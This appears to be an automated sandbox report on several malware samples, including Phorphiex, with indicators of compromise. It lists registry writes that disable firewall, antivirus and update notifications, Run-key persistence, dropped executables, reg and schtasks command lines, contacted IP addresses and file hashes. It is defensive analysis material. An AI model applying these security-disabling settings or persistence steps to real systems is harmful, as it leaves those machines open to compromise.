| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\winuedrvs.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\winuedrvs.exe" | C:\Users\Admin\AppData\Local\Temp\155217673.scr | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winuedrvs.exe | C:\Users\Admin\AppData\Local\Temp\155217673.scr | N/A |
| File opened for modification | C:\Windows\winuedrvs.exe | C:\Users\Admin\AppData\Local\Temp\155217673.scr | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\34748149.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\34748149.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\a8d0ac5762f61683d7cbcbfc53e0b650e632625d7ffabf08b45986908891ee96.exe
"C:\Users\Admin\AppData\Local\Temp\a8d0ac5762f61683d7cbcbfc53e0b650e632625d7ffabf08b45986908891ee96.exe"
C:\Users\Admin\AppData\Local\Temp\155217673.scr
C:\Users\Admin\AppData\Local\Temp\155217673.scr
C:\Windows\winuedrvs.exe
C:\Windows\winuedrvs.exe
C:\Users\Admin\AppData\Local\Temp\34748149.exe
C:\Users\Admin\AppData\Local\Temp\34748149.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "User Configuration"
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "User Configuration"
C:\Users\Admin\AppData\Local\Temp\222168598.exe
C:\Users\Admin\AppData\Local\Temp\222168598.exe
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| IR | 5.235.133.50:40500 | udp | |
| YE | 213.246.12.16:40500 | tcp | |
| IR | 5.237.216.111:40500 | udp |
Files
memory/1416-54-0x0000000075E81000-0x0000000075E83000-memory.dmp
\Users\Admin\AppData\Local\Temp\155217673.scr
| MD5 | 96de9c78028eaec7cd06d8e3e755ffc4 |
| SHA1 | 612d1261bce41723b0a981c92bf9f186c9d46fe2 |
| SHA256 | d560cfb59c61c87d0d4b33aecc98b74c58475c6dd8a3cf6f3bcff2ee05d4c45f |
| SHA512 | 5906efdbf22af2ca3dc9f75accb4bb1f50ad0ddd792a14f5f891975a8e2b5632ce9e7e0e987b216851fef66a4e9bf9c03d847631093382dae79d0d132a41264f |
\Users\Admin\AppData\Local\Temp\155217673.scr
| MD5 | 96de9c78028eaec7cd06d8e3e755ffc4 |
| SHA1 | 612d1261bce41723b0a981c92bf9f186c9d46fe2 |
| SHA256 | d560cfb59c61c87d0d4b33aecc98b74c58475c6dd8a3cf6f3bcff2ee05d4c45f |
| SHA512 | 5906efdbf22af2ca3dc9f75accb4bb1f50ad0ddd792a14f5f891975a8e2b5632ce9e7e0e987b216851fef66a4e9bf9c03d847631093382dae79d0d132a41264f |
memory/304-57-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\155217673.scr
| MD5 | 96de9c78028eaec7cd06d8e3e755ffc4 |
| SHA1 | 612d1261bce41723b0a981c92bf9f186c9d46fe2 |
| SHA256 | d560cfb59c61c87d0d4b33aecc98b74c58475c6dd8a3cf6f3bcff2ee05d4c45f |
| SHA512 | 5906efdbf22af2ca3dc9f75accb4bb1f50ad0ddd792a14f5f891975a8e2b5632ce9e7e0e987b216851fef66a4e9bf9c03d847631093382dae79d0d132a41264f |
C:\Users\Admin\AppData\Local\Temp\155217673.scr
| MD5 | 96de9c78028eaec7cd06d8e3e755ffc4 |
| SHA1 | 612d1261bce41723b0a981c92bf9f186c9d46fe2 |
| SHA256 | d560cfb59c61c87d0d4b33aecc98b74c58475c6dd8a3cf6f3bcff2ee05d4c45f |
| SHA512 | 5906efdbf22af2ca3dc9f75accb4bb1f50ad0ddd792a14f5f891975a8e2b5632ce9e7e0e987b216851fef66a4e9bf9c03d847631093382dae79d0d132a41264f |
memory/1068-61-0x0000000000000000-mapping.dmp
C:\Windows\winuedrvs.exe
| MD5 | 96de9c78028eaec7cd06d8e3e755ffc4 |
| SHA1 | 612d1261bce41723b0a981c92bf9f186c9d46fe2 |
| SHA256 | d560cfb59c61c87d0d4b33aecc98b74c58475c6dd8a3cf6f3bcff2ee05d4c45f |
| SHA512 | 5906efdbf22af2ca3dc9f75accb4bb1f50ad0ddd792a14f5f891975a8e2b5632ce9e7e0e987b216851fef66a4e9bf9c03d847631093382dae79d0d132a41264f |
C:\Windows\winuedrvs.exe
| MD5 | 96de9c78028eaec7cd06d8e3e755ffc4 |
| SHA1 | 612d1261bce41723b0a981c92bf9f186c9d46fe2 |
| SHA256 | d560cfb59c61c87d0d4b33aecc98b74c58475c6dd8a3cf6f3bcff2ee05d4c45f |
| SHA512 | 5906efdbf22af2ca3dc9f75accb4bb1f50ad0ddd792a14f5f891975a8e2b5632ce9e7e0e987b216851fef66a4e9bf9c03d847631093382dae79d0d132a41264f |
\Users\Admin\AppData\Local\Temp\34748149.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
memory/1940-66-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\34748149.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
C:\Users\Admin\AppData\Local\Temp\34748149.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
memory/1940-69-0x000000013FAA0000-0x000000013FAA6000-memory.dmp
memory/1940-70-0x000007FEFB9F1000-0x000007FEFB9F3000-memory.dmp
memory/1724-71-0x0000000000000000-mapping.dmp
memory/1900-72-0x0000000000000000-mapping.dmp
memory/436-73-0x0000000000000000-mapping.dmp
memory/796-74-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\222168598.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
memory/1600-76-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\222168598.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
Analysis: behavioral17
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win7-20220812-en
Max time kernel
151s
Max time network
151s
Command Line
Signatures
Phorphiex
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\wklopsvcs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\287145087.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1349823367.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\wklopsvcs.exe | N/A |
| N/A | N/A | C:\Windows\wklopsvcs.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\wklopsvcs.exe" | C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\wklopsvcs.exe | C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe | N/A |
| File opened for modification | C:\Windows\wklopsvcs.exe | C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\287145087.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\287145087.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe
"C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe"
C:\Windows\wklopsvcs.exe
C:\Windows\wklopsvcs.exe
C:\Users\Admin\AppData\Local\Temp\287145087.exe
C:\Users\Admin\AppData\Local\Temp\287145087.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "User Configuration"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "User Configuration"
C:\Users\Admin\AppData\Local\Temp\1349823367.exe
C:\Users\Admin\AppData\Local\Temp\1349823367.exe
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.72.235.82:80 | www.update.microsoft.com | tcp |
| SY | 46.53.24.15:40500 | tcp | |
| IR | 185.99.215.182:40500 | udp | |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| YE | 134.35.146.76:40500 | udp | |
| BD | 103.54.150.88:40500 | udp | |
| IR | 151.245.143.102:40500 | udp | |
| PK | 113.197.50.97:40500 | udp | |
| SG | 146.70.67.37:40500 | tcp | |
| IR | 2.186.89.128:40500 | udp | |
| UZ | 217.30.173.134:40500 | udp | |
| RU | 176.214.156.53:40500 | tcp | |
| YE | 46.161.239.126:40500 | udp | |
| UZ | 80.80.222.89:40500 | udp | |
| BO | 190.129.1.154:40500 | udp | |
| AF | 180.94.82.94:40500 | udp | |
| UZ | 89.236.230.220:40500 | udp | |
| UZ | 213.230.127.141:40500 | tcp | |
| MX | 189.140.139.228:40500 | udp | |
| SD | 41.209.70.145:40500 | udp | |
| YE | 80.253.178.185:40500 | udp | |
| IR | 78.38.2.163:40500 | udp | |
| KZ | 2.134.107.231:40500 | udp | |
| UZ | 213.230.120.247:40500 | tcp | |
| UZ | 213.230.97.218:40500 | udp | |
| UZ | 213.230.127.60:40500 | udp | |
| IR | 5.238.107.4:40500 | udp | |
| UZ | 217.30.160.221:40500 | udp |
Files
memory/1112-54-0x0000000074D61000-0x0000000074D63000-memory.dmp
C:\Windows\wklopsvcs.exe
| MD5 | 209baf40779b80d5e443c3dbbd656bfb |
| SHA1 | b64fa8dded031d5dacac519a2035cefcd05e6503 |
| SHA256 | c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d |
| SHA512 | 9b4e3e82e141e569c85f22dd215f804b2f4e8969cda858662efca67532ba57d2e0acdbaa179524b4996be62f9acee3298eaf6cdfd03eff7e39e23bc7163c440e |
memory/688-55-0x0000000000000000-mapping.dmp
C:\Windows\wklopsvcs.exe
| MD5 | 209baf40779b80d5e443c3dbbd656bfb |
| SHA1 | b64fa8dded031d5dacac519a2035cefcd05e6503 |
| SHA256 | c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d |
| SHA512 | 9b4e3e82e141e569c85f22dd215f804b2f4e8969cda858662efca67532ba57d2e0acdbaa179524b4996be62f9acee3298eaf6cdfd03eff7e39e23bc7163c440e |
\Users\Admin\AppData\Local\Temp\287145087.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
memory/1736-60-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\287145087.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
C:\Users\Admin\AppData\Local\Temp\287145087.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
memory/1736-63-0x000000013FDC0000-0x000000013FDC6000-memory.dmp
memory/1736-64-0x000007FEFB801000-0x000007FEFB803000-memory.dmp
memory/1444-65-0x0000000000000000-mapping.dmp
memory/1968-66-0x0000000000000000-mapping.dmp
memory/588-67-0x0000000000000000-mapping.dmp
memory/1084-68-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\1349823367.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
C:\Users\Admin\AppData\Local\Temp\1349823367.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
memory/472-70-0x0000000000000000-mapping.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win7-20220901-en
Max time kernel
126s
Max time network
134s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288cmgr.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288c.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288c.exe | N/A |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{960EF201-3F0D-11ED-809F-FE8152C730B7} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{960C8101-3F0D-11ED-809F-FE8152C730B7} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "371121285" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
